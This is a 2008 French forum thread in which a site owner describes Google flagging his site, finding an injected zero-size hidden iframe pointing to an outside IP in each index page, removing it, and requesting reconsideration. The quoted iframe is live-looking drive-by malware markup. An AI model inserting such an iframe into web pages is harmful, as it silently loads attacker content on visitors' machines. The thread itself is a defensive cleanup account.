Forums TunInternet
Derniers sujets: Ouvrir Tous les sites restrictés en Tunisie avec UltraSurf 8.9    »    quesl sont les revendeurs Apple dans la region tunis    »    Trouvez les proxies fonctionnels facilement...    »    Votre propre proxy sur votre site et ouvrez tout les sites censurés!    »    Ingénieur d'étude et de développement Java/J2EE    »    Infograhe    »    Probléme d'impression sur quark 6.5    »    Moteur de recherche e-book    »    Conversion de videos en .RM    »    Quel est votre navigateur internet préféré ?    »    Turbo Pascal Pour windows Xp SP2    »    Ubuntu-tn    »    Plateforme PHP/MySQL    »    CMS Joomla!    »    [MySQL]Répllication partielle entre serveurs d'une BDD    »    Lancement de Delicious 2.0    »    [résolu] This application requires a version of the Adobe Integrated Runtime (AIR)...    »    25 tutorials photoshop à ne pas rater    »    Google passe à 1000 milliards pages indexées    »    Cherche un site de voyance à vendre    »   

Go Back   Forums TunInternet > Forum informatique > Référencement & URL Rewriting

Register FAQ Members List Calendar Search Today's Posts Mark Forums Read
  #1 (permalink)  
Old 19-04-2008, 10:11 PM
nejib's Avatar
Super modérateur
 
Join Date: Apr 2008
Posts: 210
Default Solution du message google: "Ce site risque d'endommager votre ordinateur"

Bonjour,

J'ai réçu un email de la part de google m'informe que l'un de mes sites contient un contenu peut endommager les ordinateurs, et en cherchant ces sites sur google on tombe sur le même message suivant:

"This site may harm your computer" (sur google.com)
"Ce site risque d'endommager votre ordinateur" (google.fr)

J'etais étonné par tout sa, sa rend le site inaccessible à travers google, j'ai vérifie les codes de mes sites, et la surprise, j'ai trouver qu'il y a une iframe dans chaque index.php ou index.html comme ceci :


HTML Code:
<iframe src="http://124.217.252.62/~admin/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><!-- 1208615770 --><iframe src="http://124.217.252.62/~admin/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>


Voilà donc c'est sa qui gène google.

Je me suis documenter sur ce problème, il m'ont dit que c'est une faille en perl

ma question c'etait: Comment informer google que le contenu est désormais "propre" (après la suppression de ces lignes) ?

Solution:
Si l'un de vous a eu ce problème, il n'a qu'a connecter à son espace outils webmaster de google, et demander un réexamen de la part de google :

https://www.google.com/webmasters/to...deration?hl=fr


Bonne chance et désactivez perl/cgi du serveur si vous ne l'utilisez pas.

Digg this Post!Add Post to del.icio.usBookmark Post in Technorati
Last edited by nejib; 19-04-2008 at 10:13 PM.
Digg this Post!Add Post to del.icio.usBookmark Post in Technorati
Reply With Quote
  #2 (permalink)  
Old 20-04-2008, 01:12 AM
Administrator
 
Join Date: Apr 2008
Posts: 31
Default

Merci pour l'astuce nejib, c'est pas mal
mais une question l'adresse ip qui figure dans la frame, c'est quoi au juste c'est celle de ton site ou c'est une autre ?
Digg this Post!Add Post to del.icio.usBookmark Post in Technorati
Reply With Quote
  #3 (permalink)  
Old 20-04-2008, 02:47 AM
nejib's Avatar
Super modérateur
 
Join Date: Apr 2008
Posts: 210
Default

C'est un autre site, c'est une faille en Perl, son propriétaire l'a bien exploitée, plusieurs sites ont été infectés (webrankinfo la semaine dernière aussi)

Personnellement j'ai désactivé perl carrément dans mon serveur. tranquille
__________________
Digg this Post!Add Post to del.icio.usBookmark Post in Technorati
Reply With Quote
  #4 (permalink)  
Old 20-04-2008, 01:51 PM
Administrator
 
Join Date: Apr 2008
Posts: 31
Default

je vais le faire aussi ...
Digg this Post!Add Post to del.icio.usBookmark Post in Technorati
Reply With Quote
  #5 (permalink)  
Old 20-04-2008, 09:45 PM
wiSh's Avatar
Member
 
Join Date: Apr 2008
Location: Sousse
Posts: 94
Send a message via MSN to wiSh
Default

Merci Nejib, c'est très interessant
__________________
www.e-medecine.tk: Bibliothèque numérique médicale.
> Vers une mondialisation de l'information.
www.hached-scouts.org : Forums et discussions de scouts.
Digg this Post!Add Post to del.icio.usBookmark Post in Technorati
Reply With Quote
Reply
Tags: , , , , , , ,


Tags
endommager, google, harm, indexation, outils webmasters

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

vB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are On
Forum Jump



All times are GMT +2. The time now is 07:02 AM.


Powered by vBulletin® Version 3.7.0 Beta 3
Copyright ©2000 - 2008, Jelsoft Enterprises Ltd.
LinkBacks Enabled by vBSEO 3.1.0

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26